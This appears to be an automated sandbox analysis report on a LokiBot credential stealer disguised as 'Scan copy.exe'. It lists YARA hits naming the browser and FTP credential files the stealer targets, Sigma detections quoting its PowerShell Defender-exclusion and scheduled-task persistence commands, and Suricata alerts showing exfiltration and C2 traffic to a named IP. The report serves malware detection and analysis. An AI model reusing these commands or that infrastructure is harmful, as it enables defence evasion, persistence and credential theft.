20.2.vLQwEscoQr.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x16536:$f1: FileZilla\recentservers.xml 0x16576:$f2: FileZilla\sitemanager.xml 0x147e6:$b2: Mozilla\Firefox\Profiles 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x146fa:$s4: logins.json 0x155a4:$s6: wand.dat 0x14024:$a1: username_value 0x14014:$a2: password_value 0x1465f:$a3: encryptedUsername 0x146cc:$a3: encryptedUsername 0x14672:$a4: encryptedPassword 0x146e0:$a4: encryptedPassword
0.2.Scan copy.exe.3787008.1.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
0.2.Scan copy.exe.3787008.1.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x15ff0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
0.2.Scan copy.exe.3787008.1.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x3bbb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
0.2.Scan copy.exe.3787008.1.unpack	Loki_1	Loki Payload	kevoreilly	0x131b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x133fc:$a2: last_compatible_version
0.2.Scan copy.exe.3787008.1.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x123ff:$des3: 68 03 66 00 00 0x15ff0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x160bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
20.2.vLQwEscoQr.exe.400000.0.raw.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
20.2.vLQwEscoQr.exe.400000.0.raw.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
20.2.vLQwEscoQr.exe.400000.0.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
20.2.vLQwEscoQr.exe.400000.0.raw.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x187f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
20.2.vLQwEscoQr.exe.400000.0.raw.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x53bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
20.2.vLQwEscoQr.exe.400000.0.raw.unpack	Loki_1	Loki Payload	kevoreilly	0x151b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x153fc:$a2: last_compatible_version
20.2.vLQwEscoQr.exe.400000.0.raw.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x13bff:$des3: 68 03 66 00 00 0x187f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x188bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
20.2.vLQwEscoQr.exe.400000.0.raw.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x17936:$f1: FileZilla\recentservers.xml 0x17976:$f2: FileZilla\sitemanager.xml 0x15be6:$b2: Mozilla\Firefox\Profiles 0x15950:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x15afa:$s4: logins.json 0x169a4:$s6: wand.dat 0x15424:$a1: username_value 0x15414:$a2: password_value 0x15a5f:$a3: encryptedUsername 0x15acc:$a3: encryptedUsername 0x15a72:$a4: encryptedPassword 0x15ae0:$a4: encryptedPassword
Click to see the 52 entries

Sigma Signatures

System Summary

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Scan copy.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Scan copy.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Scan copy.exe", ParentImage: C:\Users\user\Desktop\Scan copy.exe, ParentProcessId: 5420, ParentProcessName: Scan copy.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Scan copy.exe", ProcessId: 6648, ProcessName: powershell.exe

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Suspicious Add Scheduled Task Parent

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\vLQwEscoQr" /XML "C:\Users\user\AppData\Local\Temp\tmp2BF7.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\vLQwEscoQr" /XML "C:\Users\user\AppData\Local\Temp\tmp2BF7.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\vLQwEscoQr.exe, ParentImage: C:\Users\user\AppData\Roaming\vLQwEscoQr.exe, ParentProcessId: 7512, ParentProcessName: vLQwEscoQr.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\vLQwEscoQr" /XML "C:\Users\user\AppData\Local\Temp\tmp2BF7.tmp", ProcessId: 7992, ProcessName: schtasks.exe

Sigma detected: Suspicious Schtasks From Env Var Folder

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\vLQwEscoQr" /XML "C:\Users\user\AppData\Local\Temp\tmp18EC.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\vLQwEscoQr" /XML "C:\Users\user\AppData\Local\Temp\tmp18EC.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\Scan copy.exe", ParentImage: C:\Users\user\Desktop\Scan copy.exe, ParentProcessId: 5420, ParentProcessName: Scan copy.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\vLQwEscoQr" /XML "C:\Users\user\AppData\Local\Temp\tmp18EC.tmp", ProcessId: 7172, ProcessName: schtasks.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Scan copy.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Scan copy.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Scan copy.exe", ParentImage: C:\Users\user\Desktop\Scan copy.exe, ParentProcessId: 5420, ParentProcessName: Scan copy.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Scan copy.exe", ProcessId: 6648, ProcessName: powershell.exe

Persistence and Installation Behavior

Sigma detected: Scheduled temp file as task from temp location

Source: Process started

Author: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\vLQwEscoQr" /XML "C:\Users\user\AppData\Local\Temp\tmp18EC.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\vLQwEscoQr" /XML "C:\Users\user\AppData\Local\Temp\tmp18EC.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\Scan copy.exe", ParentImage: C:\Users\user\Desktop\Scan copy.exe, ParentProcessId: 5420, ParentProcessName: Scan copy.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\vLQwEscoQr" /XML "C:\Users\user\AppData\Local\Temp\tmp18EC.tmp", ProcessId: 7172, ProcessName: schtasks.exe

Suricata Signatures

ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-28T09:14:16.413073+0100	2024312	1	A Network Trojan was detected	192.168.2.7	49703	94.156.177.41	80	TCP
2024-11-28T09:14:18.371332+0100	2024312	1	A Network Trojan was detected	192.168.2.7	49705	94.156.177.41	80	TCP

ET MALWARE LokiBot Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-28T09:14:15.096111+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49703	94.156.177.41	80	TCP
2024-11-28T09:14:16.856131+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49705	94.156.177.41	80	TCP
2024-11-28T09:14:18.697511+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49707	94.156.177.41	80	TCP
2024-11-28T09:14:20.351381+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49709	94.156.177.41	80	TCP
2024-11-28T09:14:22.160780+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49710	94.156.177.41	80	TCP
2024-11-28T09:14:23.860632+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49716	94.156.177.41	80	TCP
2024-11-28T09:14:25.519659+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49722	94.156.177.41	80	TCP
2024-11-28T09:14:27.668725+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49730	94.156.177.41	80	TCP
2024-11-28T09:14:29.385370+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49733	94.156.177.41	80	TCP
2024-11-28T09:14:31.235320+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49739	94.156.177.41	80	TCP
2024-11-28T09:14:33.051469+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49745	94.156.177.41	80	TCP
2024-11-28T09:14:34.797317+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49750	94.156.177.41	80	TCP
2024-11-28T09:14:36.663456+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49755	94.156.177.41	80	TCP
2024-11-28T09:14:38.518570+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49760	94.156.177.41	80	TCP
2024-11-28T09:14:40.330195+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49764	94.156.177.41	80	TCP
2024-11-28T09:14:42.534473+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49770	94.156.177.41	80	TCP
2024-11-28T09:14:44.345691+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49775	94.156.177.41	80	TCP
2024-11-28T09:14:46.159487+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49779	94.156.177.41	80	TCP
2024-11-28T09:14:48.063766+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49785	94.156.177.41	80	TCP
2024-11-28T09:14:49.922881+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49791	94.156.177.41	80	TCP
2024-11-28T09:14:51.737036+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49795	94.156.177.41	80	TCP
2024-11-28T09:14:53.691338+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49799	94.156.177.41	80	TCP
2024-11-28T09:14:55.562437+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49804	94.156.177.41	80	TCP
2024-11-28T09:14:57.414725+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49808	94.156.177.41	80	TCP
2024-11-28T09:14:59.272741+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49814	94.156.177.41	80	TCP
2024-11-28T09:15:01.091239+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49820	94.156.177.41	80	TCP
2024-11-28T09:15:02.750976+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49823	94.156.177.41	80	TCP
2024-11-28T09:15:04.611133+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49829	94.156.177.41	80	TCP
2024-11-28T09:15:06.425627+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49833	94.156.177.41	80	TCP
2024-11-28T09:15:08.283034+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49839	94.156.177.41	80	TCP
2024-11-28T09:15:10.092587+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49844	94.156.177.41	80	TCP
2024-11-28T09:15:11.986718+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49849	94.156.177.41	80	TCP
2024-11-28T09:15:13.869864+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49854	94.156.177.41	80	TCP
2024-11-28T09:15:15.847454+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49859	94.156.177.41	80	TCP
2024-11-28T09:15:17.771783+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49864	94.156.177.41	80	TCP
2024-11-28T09:15:19.671910+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49869	94.156.177.41	80	TCP
2024-11-28T09:15:21.490327+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49874	94.156.177.41	80	TCP
2024-11-28T09:15:23.380781+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49880	94.156.177.41	80	TCP
2024-11-28T09:15:25.077799+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49885	94.156.177.41	80	TCP
2024-11-28T09:15:26.899973+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49889	94.156.177.41	80	TCP
2024-11-28T09:15:28.747512+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49893	94.156.177.41	80	TCP
2024-11-28T09:15:30.655415+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49898	94.156.177.41	80	TCP
2024-11-28T09:15:32.556717+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49903	94.156.177.41	80	TCP
2024-11-28T09:15:34.408050+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49909	94.156.177.41	80	TCP
2024-11-28T09:15:36.267971+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49914	94.156.177.41	80	TCP
2024-11-28T09:15:38.156180+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49918	94.156.177.41	80	TCP
2024-11-28T09:15:39.816583+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49922	94.156.177.41	80	TCP
2024-11-28T09:15:41.597339+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49928	94.156.177.41	80	TCP
2024-11-28T09:15:43.294626+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49930	94.156.177.41	80	TCP
2024-11-28T09:15:45.140468+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49935	94.156.177.41	80	TCP
2024-11-28T09:15:46.988970+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49938	94.156.177.41	80	TCP
2024-11-28T09:15:48.663942+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49943	94.156.177.41	80	TCP
2024-11-28T09:15:50.622383+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49948	94.156.177.41	80	TCP
2024-11-28T09:15:52.328756+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49952	94.156.177.41	80	TCP
2024-11-28T09:15:54.218254+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49958	94.156.177.41	80	TCP
2024-11-28T09:15:55.988730+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49962	94.156.177.41	80	TCP
2024-11-28T09:15:57.686634+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49966	94.156.177.41	80	TCP
2024-11-28T09:15:59.487158+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49971	94.156.177.41	80	TCP
2024-11-28T09:16:01.189356+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49976	94.156.177.41	80	TCP
2024-11-28T09:16:02.889650+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49982	94.156.177.41	80	TCP
2024-11-28T09:16:04.587142+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49987	94.156.177.41	80	TCP
2024-11-28T09:16:06.389002+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49990	94.156.177.41	80	TCP
2024-11-28T09:16:08.095796+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49995	94.156.177.41	80	TCP
2024-11-28T09:16:09.797793+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	50000	94.156.177.41	80	TCP
2024-11-28T09:16:11.614597+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	50004	94.156.177.41	80	TCP
2024-11-28T09:16:13.446836+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	50009	94.156.177.41	80	TCP
2024-11-28T09:16:15.111182+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	50012	94.156.177.41	80	TCP

ET MALWARE LokiBot Fake 404 Response

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-28T09:14:20.086493+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.7	49707	TCP
2024-11-28T09:14:21.861763+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.7	49709	TCP
2024-11-28T09:14:23.596377+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.7	49710	TCP
2024-11-28T09:14:25.257595+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.7	49716	TCP
2024-11-28T09:14:27.389087+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.7	49722	TCP
2024-11-28T09:14:29.117592+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.7	49730	TCP
2024-11-28T09:14:30.973009+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.7	49733	TCP
2024-11-28T09:14:32.778682+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.7	49739	TCP
2024-11-28T09:14:34.531967+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.7	49745	TCP
2024-11-28T09:14:36.377840+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.7	49750	TCP
2024-11-28T09:14:38.246285+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.7	49755	TCP
2024-11-28T09:14:40.066664+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.7	49760	TCP
2024-11-28T09:14:41.915448+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.7	49764	TCP
2024-11-28T09:14:44.077722+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.7	49770	TCP
2024-11-28T09:14:45.883417+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.7	49775	TCP
2024-11-28T09:14:47.792085+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.7	49779	TCP
2024-11-28T09:14:49.654366+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.7	49785	TCP
2024-11-28T09:14:51.466613+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.7	49791	TCP
2024-11-28T09:14:53.334685+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.7	49795	TCP
2024-11-28T09:14:55.291439+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.7	49799	TCP
2024-11-28T09:14:57.142377+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.7	49804	TCP
2024-11-28T09:14:59.006862+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.7	49808	TCP
2024-11-28T09:15:00.818473+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.7	49814	TCP
2024-11-28T09:15:02.484511+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.7	49820	TCP
2024-11-28T09:15:04.341290+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.7	49823	TCP
2024-11-28T09:15:06.156297+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.7	49829	TCP
2024-11-28T09:15:08.018341+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.7	49833	TCP
2024-11-28T09:15:09.822079+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.7	49839	TCP
2024-11-28T09:15:11.725316+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.7	49844	TCP
2024-11-28T09:15:13.598708+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.7	49849	TCP
2024-11-28T09:15:15.573387+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.7	49854	TCP
2024-11-28T09:15:17.427062+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.7	49859	TCP
2024-11-28T09:15:19.401939+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.7	49864	TCP
2024-11-28T09:15:21.216237+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.7	49869	TCP
2024-11-28T09:15:23.114781+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.7	49874	TCP
2024-11-28T09:15:24.819027+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.7	49880	TCP
2024-11-28T09:15:26.618766+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.7	49885	TCP
2024-11-28T09:15:28.491168+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.7	49889	TCP
2024-11-28T09:15:30.394237+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.7	49893	TCP
2024-11-28T09:15:32.287996+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.7	49898	TCP
2024-11-28T09:15:34.139340+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.7	49903	TCP
2024-11-28T09:15:35.995187+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.7	49909	TCP
2024-11-28T09:15:37.897834+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.7	49914	TCP
2024-11-28T09:15:39.552495+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.7	49918	TCP
2024-11-28T09:15:41.329580+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.7	49922	TCP
2024-11-28T09:15:43.036876+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.7	49928	TCP
2024-11-28T09:15:44.878631+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.7	49930	TCP
2024-11-28T09:15:46.725331+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.7	49935	TCP
2024-11-28T09:15:48.384986+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.7	49938	TCP
2024-11-28T09:15:50.300740+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.7	49943	TCP
2024-11-28T09:15:52.047991+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.7	49948	TCP
2024-11-28T09:15:53.958941+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.7	49952	TCP
2024-11-28T09:15:55.697992+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.7	49958	TCP
2024-11-28T09:15:57.425469+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.7	49962	TCP
2024-11-28T09:15:59.222001+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.7	49966	TCP
2024-11-28T09:16:00.928602+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.7	49971	TCP
2024-11-28T09:16:02.628085+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.7	49976	TCP
2024-11-28T09:16:04.294475+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.7	49982	TCP
2024-11-28T09:16:06.130178+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.7	49987	TCP
2024-11-28T09:16:07.829417+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.7	49990	TCP
2024-11-28T09:16:09.534938+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.7	49995	TCP
2024-11-28T09:16:11.339205+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.7	50000	TCP
2024-11-28T09:16:13.169394+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.7	50004	TCP
2024-11-28T09:16:14.840154+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.7	50009	TCP
2024-11-28T09:16:16.552480+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.7	50012	TCP

ET MALWARE LokiBot Request for C2 Commands Detected M1

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-28T09:14:19.966495+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	49707	94.156.177.41	80	TCP
2024-11-28T09:14:21.741705+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	49709	94.156.177.41	80	TCP
2024-11-28T09:14:23.475744+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	49710	94.156.177.41	80	TCP
2024-11-28T09:14:25.137665+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	49716	94.156.177.41	80	TCP
2024-11-28T09:14:27.269118+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	49722	94.156.177.41	80	TCP
2024-11-28T09:14:28.997689+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	49730	94.156.177.41	80	TCP
2024-11-28T09:14:30.852920+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	49733	94.156.177.41	80	TCP
2024-11-28T09:14:32.658743+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	49739	94.156.177.41	80	TCP
2024-11-28T09:14:34.411968+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	49745	94.156.177.41	80	TCP
2024-11-28T09:14:36.257830+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	49750	94.156.177.41	80	TCP
2024-11-28T09:14:38.125230+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	49755	94.156.177.41	80	TCP
2024-11-28T09:14:39.946419+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	49760	94.156.177.41	80	TCP
2024-11-28T09:14:41.795444+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	49764	94.156.177.41	80	TCP
2024-11-28T09:14:43.957647+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	49770	94.156.177.41	80	TCP
2024-11-28T09:14:45.763443+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	49775	94.156.177.41	80	TCP
2024-11-28T09:14:47.672120+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	49779	94.156.177.41	80	TCP
2024-11-28T09:14:49.534406+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	49785	94.156.177.41	80	TCP
2024-11-28T09:14:51.346606+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	49791	94.156.177.41	80	TCP
2024-11-28T09:14:53.209909+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	49795	94.156.177.41	80	TCP
2024-11-28T09:14:55.171476+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	49799	94.156.177.41	80	TCP
2024-11-28T09:14:57.022105+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	49804	94.156.177.41	80	TCP
2024-11-28T09:14:58.886053+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	49808	94.156.177.41	80	TCP
2024-11-28T09:15:00.692482+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	49814	94.156.177.41	80	TCP
2024-11-28T09:15:02.364424+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	49820	94.156.177.41	80	TCP
2024-11-28T09:15:04.221399+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.7	49823	94.156.177.41	80	TCP
